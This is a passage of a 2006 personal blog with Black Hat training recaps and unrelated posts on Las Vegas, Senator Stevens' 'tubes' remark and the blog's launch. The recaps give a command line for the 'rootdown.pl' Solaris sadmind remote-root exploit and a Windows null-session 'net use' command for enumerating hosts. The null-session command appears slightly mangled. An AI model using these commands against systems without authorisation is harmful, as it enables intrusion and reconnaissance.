Blackhat Day 2

So, I completed day three of Blackhat 2006 today and today was the 1st day of my Advanced Database Hacking class, but it was actually riddled with technical difficulties and issues with the material, so I am going to put off a recap until after class tomorrow in the hope that it will pick up and come through with some good stuff for the last day.

I do however, own a recap of day 2 which was the final day of "Ultimate Hacking" put on by Foundstone. Day two covered Unix based exploits and involved some really good tools and techniques. While in general it is harder to hack than Windows, because it can be locked down better, I was surprised by how many useful techiques can be employed to enumerate and attack Unix based hosts.

The gem of the day I am going to share with you, is a tool that exploits the 'sadmind' utility in Solaris to remotely gain root access on any version of Solaris 9 and below. The "feature" was labeled such by Solaris and so it was not patched for some time as they insisted that the functionality was desireable, and in most Solaris installs has not been unconfigured since it involves a fairly security conscious admin to know how to fix the flaw.

The tool is a script called 'rootdown.pl' and can be downloaded from metasploit here. To execute it on a remote host and initiate an interactive session, issue the following command:

perl -w rootdown.pl -h -i

Blackhat Day 1 - Windows Lose or Draw

Today was day one of Blackhat here in Las Vegas. Let me just start by saying I'd forgotten how much I dislike the Vegas strip. In concept, I guess it seems cool: flashing lights, dazzling fountains, and fabulous buffets, but when you actually get here it really just turns out to be flashing prostitutes, dizzying second hand smoke, and a flabulous mass of sweaty, scantily clad tourists. Not such a pretty thing. Oh and not being a gambler, it bugs me that everything is geared towards trying to force you into the casino. All recreational activities end at 8pm (unless its a weekend, then its 6pm) to try and shuffle you onto the gaming floor for more smoke filled bliss then you can shake a stack of hooker pamphlets at (and yea, although there are less than last time I was here, the hand slappers are still alive and well - just wait 'til dark).

Oh well, I am made to suffer these things for a very noble cause. Hacking. Or rather, hacking deterence. The first of my two Blackhat courses was an "Ultimate Hacking" course taught by Foundstone, a security consulting and development company currently owned by McAffee. To say it was eye opening would be an understatement. Today's class (the first of 2 days) covered Windows exploits and how to hack a Windows host. Having never really become intimately involved with current Windows hacking practices I finally became completely and utterly convinced of the adament arguments posted by all those "Unix groupies" (into which I am slowly converting) about how insecure Windows is. Well, tomorrow we cover Unix exploits, so we will be able to compare the two after that, but for now, I am somewhat awestruck at how profound the techniques are for compromising Windows.

It seems to me that in its attempts to make everything so easily accessed and manipulated, there were some major security oversights in Windows. In fact, most of the tools needed to enumerate and fingerprint hosts and users are actually built in Windows utilities that are left open by default. Really, most attacks (minus any password cracking) can be done successfully using only internal Windows tools.

I will give you one example of said tool. This is the 'net' command. I am most familiar with it for its use as a method for spamming all the machines on a network with a message using the 'net send' option. However, it becomes even more useful when you use it to exploit a Windows "feature" (Microsoft claims it is such) that allows a host to create a null connection to another host to exchange information. The problem with this is that the information shared is very plentiful and can quickly allow an attacker to profile the host, domain, and users stored on it. This command consists of the following run from the command line:

net use \\hostnameorip\$ipc "" \u:/""

The connection, once established can then be viewed using:

net use

Once created a plethera of other commands and tools can be used to profile the host. That's really all I can give you at the moment (gotta respect that Foundstone non-disclosure agreement), but it is a pretty powerful bit of info. You should check out Foundstone's website for some more cool tools and tips. I'm really looking forward to checking out the Unix hacks in tomorrow's class. Stay tuned for a recap on those soon.

Countdown To Bl@khAt

Tomorrow afternoon, I'll be heading down to Vegas for Blackhat USA 2006 at Caesar's Palace. This is one of the world's top security/hackeresk conferences, but is geared towards security professionals rather than other hacker conferences such as HOPE or Defcon.

I will be attending 2 of the training sessions on Sat.-Sun. and then Mon.-Tues. which are "Ultimate Hacking: Black Hat Edition", which covers penetration testing and hardening, and "Advanced Database Security Assessment" which covers security issues obviously related to databases.

Props to my employer Doba for sponsoring this surely enlightening trip to Sin City. I will be taking the rest of the week off after the conference to hit the California coast with my family, but keep posted for more details and my impresssions on the conference once I get the chance to dish it out. I am a little disappointed that I can't stick around for Defcon, which starts right after my training sessions end, but I'm sure the beach will compensate me for it. Until then, it's happy trails.

The 'Tubes' that get us 'Internets'

So, maybe if you keep up at all on technology and politics, you might have heard of Senator Ted Stevens (R-Alaska), who recently explained the reason for his opposing vote on the net-neutrality bill recently brought before the Commerce Committee. His intellecutal response involves the analogy that the Internet is made up of "tubes". Check out the story with a link to the original audio at http://blog.wired.com/27BStroke6/?entry_id=1512499.

Once you're up to date on the original antics, you will really appreciate the comedy of a fake blog site created by "Senator Stevens", which really takes the Internet tube action to the next level! Check it out here (Also hosted on blogspot! Yea for blogspot!). I gotta say I got a really big kick out of it!

Welcome to my 00000001'st post (Nachooooooooooo!)

Just a shout out welcome post to everyone joining me for this inaugural listing. I finally decided it was time to make my life a little more public after the many long hours spent in front of the LCD bliss with family and friends always wanting to hear news, but getting little response. I also find it amazing how many ideas that I come across, or that come across me in a day that I plan to act on, but usually only end up remembering until the next interesting idea comes along.

That said, the purpose of this blog will be to document some of those ideas and activities that I have been involved in, or the ones that are banging around in my head needing to get put down for later retrieval. You will most likely find here a mix of personal and professional as I plan to share thoughts on work, family, life, and various technology issues. And if no one ever really ends up reading this besides me, what the hell? I could care less. So, if you are up for it, join me for some hopefully insightful and entertaining entries in the future.